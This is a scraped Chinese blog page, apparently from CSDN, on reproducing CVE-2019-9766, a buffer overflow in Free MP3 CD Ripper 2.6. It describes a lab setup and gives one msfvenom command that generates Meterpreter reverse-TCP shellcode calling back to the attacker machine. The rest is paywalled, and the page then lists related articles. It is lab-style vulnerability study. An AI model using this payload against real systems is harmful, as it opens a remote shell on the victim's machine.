CVE-2019-9766漏洞复现

最新推荐文章于 2024-04-19 23:39:18 发布
VIP文章 最新推荐文章于 2024-04-19 23:39:18 发布
阅读量395 收藏 1
点赞数
分类专栏: 安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xuandao_ahfengren/article/details/108709809
版权

简介

 

Free MP3 CD Ripper是一款音频格式转换器。Free MP3 CD Ripper 2.6版本中存在缓冲区溢出漏洞。远程攻击者可以借助特制的以.mp3为后缀的文件,利用该漏洞执行任意代码。

 

环境搭建

1.攻击机:kali                    ip:192.168.111.129

2.靶机:windows10           安装Free MP3 CD Ripper 2.6版本                 ip:192.168.3.20

 

Free CD Ripper 2.6下载地址:https://free-mp3-cd-ripper.soft32.com

 

漏洞复现

 

利用msf生成反向连接的shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.111.129 lport=888 -f c --smallest

最低0.47元/天 解锁文章
锋刃科技
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
针对OpenSSL安全漏洞调整Nginx服务器的方法
09-30
主要介绍了针对OpenSSL漏洞调整Nginx服务器的方法,2014年爆出的SSL安全漏洞震惊了全世界,需要的朋友可以参考下
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
Python2升级到最新的Python2.7.18版本。(漏洞修复)
weixin_58949710的博客
01-18 672
旧版的Python2,存在许多的漏洞。都可以通过升级到最新的Python版本解决。
警惕:Python 中少为人知的 10 个安全陷阱
sixqingfeng的博客
06-10 241
Python 开发者们在使用标准库和通用框架时,都以为自己的程序具有可靠的安全性。然而,在 Python 中,就像在任何其它编程语言中一样,有一些特性可能会被开发者们误解或误用。通常而言,只有极少的微妙之处或细节会使开发者们疏忽大意,从而在代码中引入严重的安全漏洞。在这篇博文中,我们将分享在实际 Python 项目中遇到的 10 个安全陷阱。我们选择了一些在技术圈中不太为人所知的陷阱。通过介绍每个问题及其造成的影响,我们希望提高人们对这些问题的感知,并提高大家的安全意识。如果你正在使用这些特性,请一定要排查
警惕 Python 中少为人知的十个安全陷阱(4)
m0_60229361的博客
04-12 566
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
BUUCTF 个人做题记录【7-03】
qq_61620566的博客
07-03 1382
学习才会进步
VoIP服务器曝重大漏洞,黑客可以绕过管理员身份
w3cschools的博客
11-05 421
PBX是专用小交换机的缩写,是一种交换系统,用于建立和控制电信端点之间的电话呼叫,例如常规电话机,公用电话交换网(PSTN)上的目的地以及基于Internet协议的语音的设备或服务(VoIP)网络。 据东方联盟安全组织的研究发现,该攻击利用了CVE-2019-19006(CVSS评分9.8)这一严重漏洞,影响了FreePBX和PBXact的管理员Web界面,潜在地允许未经授权的用户通过将特制数据包发送到系统来获得管理员对系统的访问权限。 远程管理员身份验证绕过漏洞影响FreePBX版本15.0.16
CVE-2019-1040 原理及复现
weixin_44747030的博客
10-07 1661
CVE-2019-1040漏洞复现
HackTheBox::Bashed
aya3t的博客
10-11 399
HackTheBox::Bashed
Apache Solr 漏洞总结
星落的博客
04-15 1770
Apache Solr简介 Solr是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。Solr是一个独立的企业级搜索应用服务器,很多企业运用solr开源服务。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。它的主要特性包括:高效、灵活的缓存功能,垂直搜索功能,高亮显示搜索结果,通过索引复制来提高可用性,提 供一套强大Data Schema来定义字段,类型和设置文本分析,提供基于Web的管理界面等。 环境搭建 ..
修复Nginx安全漏洞(CVE-2019-9516)
qq_32202099的博客
01-08 9790
修复Nginx安全漏洞(CVE-2019-9516) 近日客户在进行安全扫描时检测出Nginx有安全漏洞,简单记录下这次安全漏洞的升级过程。 客户给文档如图: 先按照修补建议去获取补丁 查看官方建议,需要将nginx进行升级到1.17.3,下载地址:http://nginx.org/download/ 将下载好的nginx上传到服务器上,解压 tar -zxvf nginx-1.17.3.tar.gz 以为项目正在运行,因此这次升级需要在不影响业务系统情况下进行平滑升级 因为前期部署Nginx是直接
人工智能安全与光明时代
qq18218628646的博客
04-19 459
模式许可和监督可能会适得其反,因为以不可持续的方式集中权力
从智能家居到智能城市:物联网中的隐私和安全风险
网络安全服务提供商
04-19 326
由于隐私和安全这些问题,已经变得与物联网相关的设备不同的程度上挂钩。例如,黑客可能通过使用物联网设备拦截人们的传输数据来获取身份信息和敏感的个人信息,或利用智能交通系统的漏洞,让整个城市的交通陷入混乱。由于没有标准,就模糊了设备和系统的安全和隐私标准,限制了智能家居和智能城市的持续发展。其次,我们需要建立更多的标准和规范来规范物联网的发展,从而进一步提高物联网设备和技术的安全性和互操作性。通过不断更新技术,加强安全和隐私的保护,我们可以享受到物联网设备和技术带来的便利性,从而更好地掌控我们的生活。
账号安全基本措施2
最新发布
2301_78327423的博客
04-19 256
例如:配置zhangsan用户只能执行挂载命令,/usr/bin/mount /dev/sr0 /mnt/命令。在110行我们看到在这个组中,NOPASSWD:ALL,是要加入到wheel组中的,使用sudo执行任何命令不需要密码。第三列是开放的命令,比如:/usr/bin/mount /dev/sr0 /mnt/只能执行这一条命令。在/etc/sudoers.d/下写一个配置文件:vim /etc/sudoers.d/test。测试别名的使用,只有在/usr/bin/下的命令才可以无密码使用。
20232831袁思承2023-2024-2 《网络攻防实践》第6次作业
qq_53198713的博客
04-19 374
网络攻防~
CVE-2019-11477 漏洞复现教程
05-27
我很抱歉,由于 CVE-2019-11477 是一种漏洞,攻击该漏洞可能导致远程服务器拒绝服务或崩溃,因此我无法提供该漏洞复现教程或攻击代码。在任何情况下,攻击漏洞是违法行为,违反了信息安全法律法规,也会对网络安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值